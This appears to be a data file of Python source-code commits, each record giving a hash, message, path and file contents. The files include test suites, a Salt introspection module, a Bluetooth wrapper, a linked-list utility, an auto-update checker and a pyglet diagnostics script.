tracer = ThreadChangeEventRecorder(fh)
self.tracers[thread] = tracer
return tracer
else:
return self.tracers[thread]
class ThreadChangeEventRecorder(object):
""" A single thread trait change event recorder.
"""
def __init__(self, fh):
""" Class constructor
Parameters
----------
fh : stream
An io stream to store the records for each trait change.
"""
self.indent = 1
self.fh = fh
def pre_tracer(self, obj, name, old, new, handler):
""" Record a string representation of the trait change dispatch
"""
indent = self.indent
time = datetime.utcnow().isoformat(' ')
handle = self.fh
handle.write(
CHANGEMSG.format(
time=time,
direction='>',
length=indent*2,
name=name,
old=old,
new=new,
class_name=obj.__class__.__name__,
).encode('utf-8'),
)
handle.write(
CALLINGMSG.format(
time=time,
gap=indent*2 + 9,
action='CALLING',
handler=handler.__name__,
source=inspect.getsourcefile(handler),
).encode('utf-8'),
)
self.indent += 1
def post_tracer(self, obj, name, old, new, handler, exception=None):
""" Record a string representation of the trait change return
"""
self.indent -= 1
handle = self.fh
indent = self.indent
if exception:
exception_msg = ' [EXCEPTION: {}]'.format(exception)
else:
exception_msg = ''
handle.write(
EXITMSG.format(
direction='<',
length=indent*2,
handler=handler.__name__,
exception=exception_msg,
).encode('utf-8'),
)
if indent == 1:
handle.write(u'\n'.encode('utf-8'))
@contextmanager
def record_events(trace_directory):
""" Record trait change events.
Parameters
----------
trace_directory : string
The directory where the change log for each event will be saved
"""
recorder = ChangeEventRecorder(trace_directory)
trait_notifiers.set_change_event_tracers(
pre_tracer=recorder.pre_tracer, post_tracer=recorder.post_tracer)
try:
yield
finally:
trait_notifiers.clear_change_event_tracers()
recorder.close()
| Python | 0.000001 | |
0ede4e22370a3f8217fee8ff995a9c7057d8b00b | Add test for redis test helper | vumi_http_retry/tests/test_redis.py | vumi_http_retry/tests/test_redis.py | import json
from twisted.trial.unittest import TestCase
from twisted.internet.defer import inlineCallbacks
from vumi_http_retry.tests.redis import create_client, zitems
class TestRedis(TestCase):
@inlineCallbacks
def setUp(self):
self.redis = yield create_client()
@inlineCallbacks
def tearDown(self):
yield self.redis.delete('foo')
yield self.redis.transport.loseConnection()
@inlineCallbacks
def test_add_request(self):
self.assertEqual((yield zitems(self.redis, 'foo')), [])
yield self.redis.zadd('foo', 1, json.dumps({'bar': 23}))
self.assertEqual((yield zitems(self.redis, 'foo')), [
(1, {'bar': 23}),
])
yield self.redis.zadd('foo', 2, json.dumps({'baz': 42}))
self.assertEqual((yield zitems(self.redis, 'foo')), [
(1, {'bar': 23}),
(2, {'baz': 42}),
])
| Python | 0 | |
d0237f2b77a49933a4b22b43f967e414be196ff4 | Add sysmod module to replace old introspection modules | salt/modules/sysmod.py | salt/modules/sysmod.py | '''
The sys module provides information about the available functions on the
minion.
'''
def __virtual__():
'''
Return as sys
'''
return 'sys'
def doc(module=''):
'''
Return the docstrings for all modules, these strings are aggregated into
a single document on the master for easy reading.
CLI Example::
salt \* sys.doc
'''
docs = {}
for fun in __salt__:
if fun.startswith(module):
docs[fun] = __salt__[fun].__doc__
return docs
def list_functions(module=''):
'''
List the functions. Optionally, specify a module to list from.
CLI Example::
salt \* sys.list_functions
'''
names = set()
for func in __salt__:
if module:
if func.startswith('{0}.'.format(module)):
names.add(func)
else:
names.add(func)
return sorted(names)
def list_modules():
'''
List the modules loaded on the minion
CLI Example::
salt \* sys.list_modules
'''
modules = set()
for func in __salt__:
comps = func.split('.')
if len(comps) < 2:
continue
modules.add(comps[0])
return sorted(modules)
def reload_modules():
'''
Tell the minion to reload the execution modules
CLI Example::
salt \* sys.reload_modules
'''
# This is handled inside the minion.py file, the function is caught before
# it ever gets here
return True
| Python | 0 | |
fa55ceb71ff254f8ed3413a35acfe20da7c03a91 | Create BT Comm wrapper class | rxbtcomm.py | rxbtcomm.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2016 F Dou<programmingrobotsstudygroup@gmail.com>
# See LICENSE for details.
import bluetooth
import logging
class RxBtComm(object):
"""BT communication wrapper:
Attributes:
addy: A string representing the device address.
name: A string representing the device name.
"""
logging.basicConfig(level=logging.DEBUG)
def __init__(self, addr, name=None):
"""Return a RxBtComm object
param *addr* device address
param *name* device name
"""
self.addr = addr
self.name = name
self.sock = None
"""connect:
Connect to BT addr
"""
def connect(self):
try:
port = 1
self.sock=bluetooth.BluetoothSocket( bluetooth.RFCOMM )
self.sock.connect((self.addr, port))
return bluetooth.lookup_name(self.addr)
except Exception as e:
logging.exception(e)
return ''
"""disconnect:
Disconnect from BT addr
"""
def disconnect(self):
try:
self.sock.close()
except Exception as e:
logging.exception(e)
self.sock = None
"""send:
Send a command to host
"""
def send(self, cmd):
self.sock.send(cmd)
"""recieve:
Recieve a response from host
"""
def recieve(self):
self.sock.recieve(cmd)
### Replace xx:xx:xx:xx:xx:xx with your test device address
#test = RXComm('xx:xx:xx:xx:xx:xx', 'Test Device')
#test.connect()
#test.send('date')
#test.disconnect()
| Python | 0 | |
4053aa99100e2fdc1a342a472492f53138a66d6b | Add internal utils module | pies/_utils.py | pies/_utils.py | """
pies/_utils.py
Utils internal to the pies library and not meant for direct external usage.
Copyright (C) 2013 Timothy Edmund Crosley
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
def with_metaclass(meta, *bases):
"""
Enables use of meta classes across Python Versions.
taken from jinja2/_compat.py
Use it like this::
class BaseForm(object):
pass
class FormType(type):
pass
class Form(with_metaclass(FormType, BaseForm)):
pass
"""
class metaclass(meta):
__call__ = type.__call__
__init__ = type.__init__
def __new__(cls, name, this_bases, d):
if this_bases is None:
return type.__new__(cls, name, (), d)
return meta(name, bases, d)
return metaclass('temporary_class', None, {})
def unmodified_isinstance(*bases):
"""
When called in the form MyOverrideClass(unmodified_isinstance(BuiltInClass))
it allows calls against passed in built in instances to pass even if there not a subclass
"""
class UnmodifiedIsInstance(type):
def __instancecheck__(cls, instance):
return isinstance(instance, bases)
return with_metaclass(UnmodifiedIsInstance, *bases)
| Python | 0.000001 | |
dda01f555231b93b91b71a528c210dd722e370d2 | Add flat type driver unittests | neutron/tests/unit/ml2/test_type_flat.py | neutron/tests/unit/ml2/test_type_flat.py | # Copyright (c) 2014 Thales Services SAS
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.common import exceptions as exc
import neutron.db.api as db
from neutron.plugins.common import constants as p_const
from neutron.plugins.ml2 import driver_api as api
from neutron.plugins.ml2.drivers import type_flat
from neutron.tests import base
FLAT_NETWORKS = 'flat_net1, flat_net2'
class FlatTypeTest(base.BaseTestCase):
def setUp(self):
super(FlatTypeTest, self).setUp()
db.configure_db()
self.driver = type_flat.FlatTypeDriver()
self.driver._parse_networks(FLAT_NETWORKS)
self.session = db.get_session()
self.addCleanup(db.clear_db)
def _get_allocation(self, session, segment):
return session.query(type_flat.FlatAllocation).filter_by(
physical_network=segment[api.PHYSICAL_NETWORK]).first()
def test_validate_provider_segment(self):
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: 'flat_net1'}
self.driver.validate_provider_segment(segment)
def test_validate_provider_segment_without_physnet_restriction(self):
self.driver._parse_networks('*')
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: 'other_flat_net'}
self.driver.validate_provider_segment(segment)
def test_validate_provider_segment_with_missing_physical_network(self):
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT}
self.assertRaises(exc.InvalidInput,
self.driver.validate_provider_segment,
segment)
def test_validate_provider_segment_with_unsupported_physical_network(self):
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: 'other_flat_net'}
self.assertRaises(exc.InvalidInput,
self.driver.validate_provider_segment,
segment)
def test_validate_provider_segment_with_unallowed_segmentation_id(self):
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: 'flat_net1',
api.SEGMENTATION_ID: 1234}
self.assertRaises(exc.InvalidInput,
self.driver.validate_provider_segment,
segment)
def test_reserve_provider_segment(self):
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: 'flat_net1'}
self.driver.reserve_provider_segment(self.session, segment)
alloc = self._get_allocation(self.session, segment)
self.assertEqual(segment[api.PHYSICAL_NETWORK], alloc.physical_network)
def test_release_segment(self):
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: 'flat_net1'}
self.driver.reserve_provider_segment(self.session, segment)
self.driver.release_segment(self.session, segment)
alloc = self._get_allocation(self.session, segment)
self.assertIsNone(alloc)
def test_reserve_provider_segment_already_reserved(self):
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: 'flat_net1'}
self.driver.reserve_provider_segment(self.session, segment)
self.assertRaises(exc.FlatNetworkInUse,
self.driver.reserve_provider_segment,
self.session, segment)
def test_allocate_tenant_segment(self):
observed = self.driver.allocate_tenant_segment(self.session)
self.assertIsNone(observed)
| Python | 0.000001 | |
b52b4cb39029d55a06e15b527cb4789e2988093d | Add word2vec example | word2vec.py | word2vec.py | from pyspark.sql import SparkSession
from pyspark.ml.feature import Word2Vec
def main():
spark = SparkSession.builder \
.appName("Spark CV-job ad matching") \
.config("spark.some.config.option", "some-value") \
.master("local[*]") \
.getOrCreate()
# Input data: Each row is a bag of words from a sentence or document.
documentDF = spark.createDataFrame([
("Hi I heard about Spark".split(" "), ),
("I wish Java could use case classes".split(" "), ),
("Logistic regression models are neat".split(" "), )
], ["text"])
documentDF2 = spark.createDataFrame([
("Hi I heard about Spark".split(" "), ),
("I wish Java could use case classes".split(" "), )
], ["text"])
# Learn a mapping from words to Vectors.
word2Vec = Word2Vec(vectorSize=3, minCount=0, inputCol="text", outputCol="result")
model = word2Vec.fit(documentDF)
model2 = word2Vec.fit(documentDF2)
result = model.transform(documentDF)
for row in result.collect():
text, vector = row
print("Text: [%s] => \nVector: %s\n" % (", ".join(text), str(vector)))
if __name__ == '__main__':
main()
| Python | 0.002897 | |
9607c55eacfd58704a4e83a2476471aa2da6124c | add package py-doxypypy (#3284) | var/spack/repos/builtin/packages/py-doxypypy/package.py | var/spack/repos/builtin/packages/py-doxypypy/package.py | ##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyDoxypypy(PythonPackage):
"""A Doxygen filter for Python.
A more Pythonic version of doxypy, a Doxygen filter for Python.
"""
homepage = "https://github.com/Feneric/doxypypy"
url = "https://pypi.io/packages/source/d/doxypypy/doxypypy-0.8.8.6.tar.gz"
version('0.8.8.6', '6b3fe4eff5d459400071b626333fe15f')
depends_on('py-setuptools', type='build')
| Python | 0 | |
83fa6b23563903192376a3419b460b9b06479248 | Add procstat.py | src/procstat.py | src/procstat.py | import os.path
import argparse
import logging
logging.basicConfig(level=logging.DEBUG)
class Procstat():
PROCSTATPATH = '/proc/%d/stat'
STATLIST = (
'pid',
'comm',
'state',
'ppid',
'pgrp',
'session',
'tty_nr',
'tpgid',
'flags',
'minflt',
'cminflt',
'mjflt',
'cmajflt',
'utime',
'stime',
'cutime',
'cstime',
'priority',
'nice',
'num_threads',
'itrealvalue',
'starttime',
'vsize',
'rss',
'rsslim',
'startcode',
'endcode',
'startstack',
'kstkesp',
'kstkeip',
'signal',
'blocked',
'sigignore',
'sigcatch',
'wchan',
'nswap',
'cnswap',
'exit_signal',
'processor',
'rt_priority',
'policy',
'delayacct_blkio_ticks',
'guest_time',
'cguest_time')
def __init__(self, pid):
fstat = self.PROCSTATPATH % args.pid
if not os.path.exists(fstat):
logging.error('PID is not valid')
return None
with open(fstat, 'r') as f:
procStat = f.readline().split()
self.stat = {}
for i in range(len(self.STATLIST)):
self.stat[self.STATLIST[i]] = procStat[i]
strComm = self.stat['comm']
self.stat['comm'] = str(strComm[1:len(strComm) - 1])
def __str__(self):
rl = ''
for i in self.STATLIST:
rl += '%s(%s)' % (i, self.stat[i])
return rl
def getStat(self, name):
return self.stat[name] if self.stat[name] else ''
def printStat(self, readable=False):
l = ''
for i in self.STATLIST:
v = self.stat[i]
l += '%-12s : %s\n' % (i, v)
print(l)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Process stat information parser')
parser.add_argument('pid', type=int, help='Pid')
args = parser.parse_args()
pstat = Procstat(args.pid)
pstat.printStat()
| Python | 0 | |
0728e6a4f8f06e1d4d137259f76796d1dbfa1a9d | add a wsgi.py that eagerly reads in POSTdata | edx_ora/wsgi_eager.py | edx_ora/wsgi_eager.py | """
WSGI config for ora project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "edx_ora.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import WSGIHandler
class ForceReadPostHandler(WSGIHandler):
"""WSGIHandler that forces reading POST data before forwarding to the
application.
nginx as a proxy expects the backend to respond only after the
whole body of the request has been read. In some cases (see below)
the backend starts responding before reading the request. This
causes nginx to return a 502 error, instead of forwarding the
proper response to the client, which makes very hard to debug
problems with the backend.
Cases where the backend responds early:
- Early errors from django, for example errors from view decorators.
- POST request with large payloads, which may get chunked by nginx.
django sends a 100 Continue response before reading the whole body.
For more information:
http://kudzia.eu/b/2012/01/switching-from-apache2-to-nginx-as-reverse-proxy
"""
def get_response(self, request):
data = request.POST.copy() # read the POST data passing it
return super(ForceReadPostHandler, self).get_response(request)
application = ForceReadPostHandler()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| Python | 0 | |
fb336764f1a95d591e04f0061009c555b7217274 | Create FoodDiversity.py | FoodDiversity.py | FoodDiversity.py | import csv
import math
import collections
from collections import Counter
# EntFunc calculates the Shannon index for the diversity of venues in a given zip code.
def EntFunc(list,list2):
k = 0
Entropy = 0
for k in range(0, len(BusinessName)):
if BusinessName[k] != BusinessName[k - 1]:
p = float(BusinessName.count(BusinessName[k])) / float(len(BusinessName))
Entropy = -1.0 * math.log(p) * p + Entropy
k = k + 1
if Entropy != 0: print zip[j],k,Entropy
#Take in data from ESRI business lists by zip code.
#The entry matrix takes in values by zip code then the business name within the zip code.
#The BusinessName list is there simply to take in business names and determine how often unique values repeat for diversity calculations.
ReadFile = 'SIC581208.csv'
inf = csv.reader(open(ReadFile, "rU"))
i = 0
entry=[[],[]]
BusinessName=[]
#Store zip and business name data from ESRI file.
for row in inf:
i = i + 1
if i > 1:
entry[0].append(long(row[6]))
entry[1].append(row[1])
#Sort the zip code values by zip code.
zip = sorted(list(set(entry[0])),key=float)
#Sort all stored information by zip code.
#Output business diversity by zip code.
j=0
entry.sort(key=lambda x: x[0])
for i in range(0,len(entry[0])):
if entry[0][i] == zip[j]:
BusinessName.append(entry[1][i])
else:
EntFunc(BusinessName,zip[j])
j=j+1
BusinessName=[]
| Python | 0 | |
388a7eea596fdbcd79005b06d26d54b182b75696 | add package | package.py | package.py | # coding=UTF-8
#!/usr/bin/python
'''
文件夹结构 --zip
animate
unzip.py
release
'''
import os, sys, zipfile
import shutil
import commands
# Config
dir = "equip"
output = "output"
def texturePacker(floder, oriName):
'''
打包图片
'''
target = "../" + floder + "/"
#pwd
#--content-protection 64baaa7a545a4eb7a90f7a452a703f13
##打包 atlas
cmd = "TexturePacker --size-constraints NPOT --force-squared --multipack --force-word-aligned --algorithm MaxRects --premultiply-alpha --format spine --opt RGBA4444 --dither-atkinson-alpha --data " + target + oriName + ".atlas --texture-format png --sheet " + target + oriName + ".png " + "./"
#cmd = "TexturePacker --size-constraints NPOT --force-squared --content-protection 64baaa7a545a4eb7a90f7a452a703f13 --multipack --force-word-aligned --algorithm MaxRects --reduce-border-artifacts --format cocos2d --opt RGBA4444 --dither-fs-alpha --data " + target + "animate.plist --texture-format pvr2ccz --sheet " + target + "animate.pvr.ccz " + target + "texture/"
print commands.getoutput(cmd)
print "-------" + oriName + " is success-----"
def run():
nameConfig = {"horse": ["ma-bz", "ma-jiao-q", "ma-dt-q", "ma-xt-q", "ma-pg", "ma-yao", "ma-xiong", "ma-jiao-h", "ma-dt-h", "ma-xt-h", "ma-wb-s", "ma-tou", "ma-jiao-h-01", "ma-dt-h-01", "ma-xt-h-01", "ma-jiao-q-01", "ma-dt-q-01", "ma-xt-q-01"],
"helmet":["tou-tk", "tou-tk-s", "tou-tf-r", "tou-tf-l", "tou-tk-h"],
"armour":["db-r-s", "xb-r", "yd", "qz-r", "qz-l", "qz-m", "xt-l", "dt-r", "yao-q", "xiong", "bozi", "pg", "yao", "shou-l", "shou-r", "xb-l", "db-l-s", "db-l", "pf", "xiong-q"],
"weapon":["wq-r", "wq-l"],
"face": ["tou"],
"face1": ["tou1"],
"face2": ["tou2"],
"face3": ["tou3"],
"face4": ["tou4"],
"face5": ["tou5"],
"face6": ["tou6"],
"face7": ["tou7"],
"face8": ["tou8"],
"face9": ["tou9"]
}
list = os.listdir(dir)
if os.path.exists(output):
shutil.rmtree(output)
os.mkdir(output)
for l in list:
tf = os.path.join(dir, l)
if os.path.isdir(tf):
#os.chdir(tf)
#pngList = os.listdir(os.getcwd())
for (key , value) in nameConfig.items():
print key, value
tmp = os.path.join(output, "tmp")
if os.path.exists(tmp) == False:
os.mkdir(tmp)
for e in value :
copyFile = os.path.join(os.getcwd(), tf, e + ".png")
if os.path.exists(copyFile):
shutil.copy(copyFile, tmp)
tmpLen = len(os.listdir(tmp))
os.chdir(os.path.join(output, "tmp"))
#print("HHHHHHH:" + len(os.listdir(tmp)))
if tmpLen > 0:
texturePacker(l, key)
os.chdir("../../")
shutil.rmtree(tmp)
return
#main fun
run()
| Python | 0.000001 | |
40d687be843e3de56eb00a028e07866391593315 | Add defaults.py | salt/defaults.py | salt/defaults.py | # -*- coding: utf-8 -*-
'''
Default values, to be imported elsewhere in Salt code
Do NOT, import any salt modules (salt.utils, salt.config, etc.) into this file,
as this may result in circular imports.
'''
# Default delimiter for multi-level traversal in targeting
DEFAULT_TARGET_DELIM = ':'
| Python | 0 | |
26db82fd8560d54b1f385814b8871e6fba42fa91 | Add Linked List (#71) | utilities/python/linked_list.py | utilities/python/linked_list.py | # Singly-Linked List
#
# The linked list is passed around as a variable pointing to the
# root node of the linked list, or None if the list is empty.
class LinkedListNode:
def __init__(self, value):
self.value = value
self.next = None
def linked_list_append(linked_list, value):
'''Appends a value to the end of the linked list'''
node = linked_list
insert_node = LinkedListNode(value)
if not node:
return insert_node
while node.next:
node = node.next
node.next = insert_node
return linked_list
def linked_list_insert_index(linked_list, value, index):
'''Inserts a value at a particular index'''
node = linked_list
insert_node = LinkedListNode(value)
# Check if inserting at head
if index == 0:
insert_node.next = node
return insert_node
# Skip ahead
for _ in range(index - 1):
node = node.next
if not node:
raise ValueError
insert_node.next = node.next
node.next = insert_node
return linked_list
def linked_list_delete(linked_list, value):
'''Deletes the first occurrence of a value in the linked list'''
node = linked_list
# Check if deleting at head
if node.value == value:
return node.next
# Skip ahead
while node.next:
if node.next.value == value:
node.next = node.next.next
return linked_list
node = node.next
raise ValueError
def linked_list_delete_index(linked_list, index):
'''Deletes the element at a particular index in the linked list'''
node = linked_list
# Check if deleting at head
if index == 0:
return node.next
# Skip ahead
for _ in range(index - 1):
node = node.next
if not node:
raise ValueError
if not node.next:
raise ValueError
node.next = node.next.next
return linked_list
def linked_list_iter(linked_list):
'''Lazy iterator over each node in the linked list'''
node = linked_list
while node is not None:
yield node
node = node.next
# Append to back
linked_list = None # Start with an empty linked list
linked_list = linked_list_append(linked_list, 1)
linked_list = linked_list_append(linked_list, 2)
linked_list = linked_list_append(linked_list, 4)
print([node.value for node in linked_list_iter(linked_list)])
# Insert by index
linked_list = linked_list_insert_index(linked_list, 0, 0) # Front
print([node.value for node in linked_list_iter(linked_list)])
linked_list = linked_list_insert_index(linked_list, 3, 3) # Back
print([node.value for node in linked_list_iter(linked_list)])
# Delete "3"
linked_list = linked_list_delete(linked_list, 3)
print([node.value for node in linked_list_iter(linked_list)])
# Delete by index
linked_list = linked_list_delete_index(linked_list, 0)
print([node.value for node in linked_list_iter(linked_list)])
linked_list = linked_list_delete_index(linked_list, 1)
print([node.value for node in linked_list_iter(linked_list)])
# Delete until empty
linked_list = linked_list_delete_index(linked_list, 0)
linked_list = linked_list_delete_index(linked_list, 0)
print([node.value for node in linked_list_iter(linked_list)])
| Python | 0 | |
e3fada7038509faa7f057d37d485f15f7851196b | Create ProgramCheckAndUpdate.py | scripts/ProgramCheckAndUpdate.py | scripts/ProgramCheckAndUpdate.py | # ------------------------------------------------------------------------------
# Copyright 2013 Esri
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
# Name: ProgramCheckandUpdate.py
# Description: Checks and Updates workflow from Github if required.
# Version: 20190106
# Requirements:
# Author: Esri Imagery Workflows team
# ------------------------------------------------------------------------------
#!/usr/bin/env pythonimport requests
from datetime import datetime
import datetime as dt
import json
import os
import io
import requests
import zipfile
from dateutil.relativedelta import *
class ProgramCheckAndUpdate(object):
def readCheckForUpdate(self, filepath):
dict_check = {}
try:
with open(filepath) as f:
content = f.read()
dict_check = json.loads(content)
return dict_check
except BaseException:
return None
def readVersionJSON(self, checkFileURL):
try:
f = requests.get(checkFileURL)
x = f.content
versionJSON = json.loads(x)
return versionJSON
except BaseException:
return None
def checkUpdate(self, dict_check, versionJSON):
try:
current_date = datetime.today().strftime('%Y-%m-%d')
latest_version = versionJSON['Version']
dict_check['LastChecked'] = current_date
currentVersion = dict_check['CurrentVersion']
if(latest_version > currentVersion):
dict_check['NewVersion'] = versionJSON['Version']
dict_check['VersionMessage'] = versionJSON['Message']
dict_check['UpdateLocation'] = versionJSON['Install']
return[True, dict_check]
else:
return[False, dict_check]
except BaseException:
return [False, None]
def UpdateLocalRepo(self, install_url, path):
if(install_url.endswith('/')):
download_url = install_url + 'archive/master.zip'
else:
download_url = install_url + '/archive/master.zip'
repo_download = requests.get(download_url)
zip_repo = zipfile.ZipFile(io.BytesIO(repo_download.content))
zip_repo.extractall(path)
def WriteNewCheckForUpdate(self, dict_check, filepath):
try:
with open(filepath, 'w') as f:
json.dump(dict_check, f, indent=4)
return True
except BaseException:
return False
def IsCheckRequired(self, dict_check):
try:
currentVersion = dict_check['CurrentVersion']
if("LastChecked" in dict_check.keys()):
if(dict_check["LastChecked"] == ""):
lastChecked = "1970-01-01"
else:
lastChecked = dict_check['LastChecked']
else:
lastChecked = "1970-01-01"
lastChecked_dateobj = datetime.strptime(lastChecked, '%Y-%m-%d')
checkForUpdate = dict_check['CheckForUpdate']
current_date = datetime.today().strftime('%Y-%m-%d')
if(checkForUpdate == "Never"):
return False
elif(checkForUpdate == "Daily"):
if(current_date > lastChecked):
return True
else:
return False
elif(checkForUpdate == "Monthly"):
update_date = (lastChecked_dateobj + dt.timedelta(days=+30)).strftime('%Y-%m-%d')
if(current_date > update_date):
return True
else:
return False
except BaseException:
return None
def run(self, localrepo_path):
try:
checkUpdateFilePath = os.path.join(localrepo_path, "CheckForUpdate.json")
chkupdate = self.readCheckForUpdate(checkUpdateFilePath)
if chkupdate is None:
return "Unable to read CheckForUpdate JSON"
if(self.IsCheckRequired(chkupdate)):
versionJSON = self.readVersionJSON(checkFileURL=chkupdate['CheckFile'])
if versionJSON is None:
return "Unable to read VersionJSON"
[update_available, dict_check] = self.checkUpdate(chkupdate, versionJSON)
self.WriteNewCheckForUpdate(dict_check, checkUpdateFilePath)
if(dict_check['OnNewVersion'] == "Warn"):
return("Update Available, but not updating")
elif(dict_check['OnNewVersion'] == "Ignore"):
return("Ignore")
elif(dict_check['OnNewVersion'] == "Update"):
self.UpdateLocalRepo(versionJSON['Install'], path=os.path.join((os.path.dirname(localrepo_path)), "Updated"))
else:
return("Incorrect Parameter. Please check OnNewVersion Parameter in CheckForUpdate.txt")
else:
try:
current_date = datetime.today().strftime('%Y-%m-%d')
chkupdate['LastChecked'] = current_date
self.WriteNewCheckForUpdate(chkupdate, checkUpdateFilePath)
except Exception as e:
return(str(e))
except Exception as e:
return str(e)
# ExampleImplementation
a = ProgramCheckAndUpdate()
x = a.run("C:\\Image_Mgmt_Workflows\\mdcs-py-master")
| Python | 0 | |
43510585fcf2d9bd3953f3a4948f3aaebbc00e10 | Add pyglet.info | pyglet/info.py | pyglet/info.py | #!/usr/bin/env python
'''Get environment information useful for debugging.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: $'
_first_heading = True
def _heading(heading):
global _first_heading
if not _first_heading:
print
else:
_first_heading = False
print heading
print '-' * 78
def dump_python():
'''Dump Python version and environment to stdout.'''
import os
import sys
print 'sys.version:', sys.version
print 'sys.platform:', sys.platform
print 'os.getcwd():', os.getcwd()
for key, value in os.environ.items():
if key.startswith('PYGLET_'):
print "os.environ['%s']: %s" % (key, value)
def dump_pyglet():
'''Dump pyglet version and options.'''
import pyglet
print 'pyglet.version:', pyglet.version
print 'pyglet.__file__:', pyglet.__file__
for key, value in pyglet.options.items():
print "pyglet.options['%s'] = %r" % (key, value)
def dump_window():
'''Dump display, windowm, screen and default config info.'''
import pyglet.window
platform = pyglet.window.get_platform()
print 'platform:', repr(platform)
display = platform.get_default_display()
print 'display:', repr(display)
screens = display.get_screens()
for i, screen in enumerate(screens):
print 'screens[%d]: %r' % (i, screen)
window = pyglet.window.Window()
for key, value in window.config.get_gl_attributes():
print "config['%s'] = %r" % (key, value)
print 'context:', repr(window.context)
window.close()
def dump_gl():
'''Dump GL info.'''
from pyglet.gl import gl_info
print 'gl_info.get_version():', gl_info.get_version()
print 'gl_info.get_vendor():', gl_info.get_vendor()
print 'gl_info.get_renderer():', gl_info.get_renderer()
print 'gl_info.get_extensions():'
extensions = list(gl_info.get_extensions())
extensions.sort()
for name in extensions:
print ' ', name
def dump_glu():
'''Dump GLU info.'''
from pyglet.gl import glu_info
print 'glu_info.get_version():', glu_info.get_version()
print 'glu_info.get_extensions():'
extensions = list(glu_info.get_extensions())
extensions.sort()
for name in extensions:
print ' ', name
def dump_media():
'''Dump pyglet.media info.'''
import pyglet.media
print 'driver:', pyglet.media.driver.__name__
def dump_avbin():
'''Dump AVbin info.'''
try:
import pyglet.media.avbin
print 'Library:', pyglet.media.avbin.av
print 'AVbin version:', pyglet.media.avbin.av.avbin_get_version()
print 'FFmpeg revision:', \
pyglet.media.avbin.av.avbin_get_ffmpeg_revision()
except:
print 'AVbin not available.'
def _try_dump(heading, func):
_heading(heading)
try:
func()
except:
import traceback
traceback.print_exc()
def dump():
'''Dump all information to stdout.'''
_try_dump('Python', dump_python)
_try_dump('pyglet', dump_pyglet)
_try_dump('pyglet.window', dump_window)
_try_dump('pyglet.gl.gl_info', dump_gl)
_try_dump('pyglet.gl.glu_info', dump_glu)
_try_dump('pyglet.media', dump_media)
_try_dump('pyglet.media.avbin', dump_avbin)
if __name__ == '__main__':
dump()
| Python | 0 | |
52dc608438940e098900e1380f11ee3094c118ae | Add log file in script higher_education and add download by year. | scripts/data_download/higher_education/create_files.py | scripts/data_download/higher_education/create_files.py | # -*- coding: utf-8 -*-
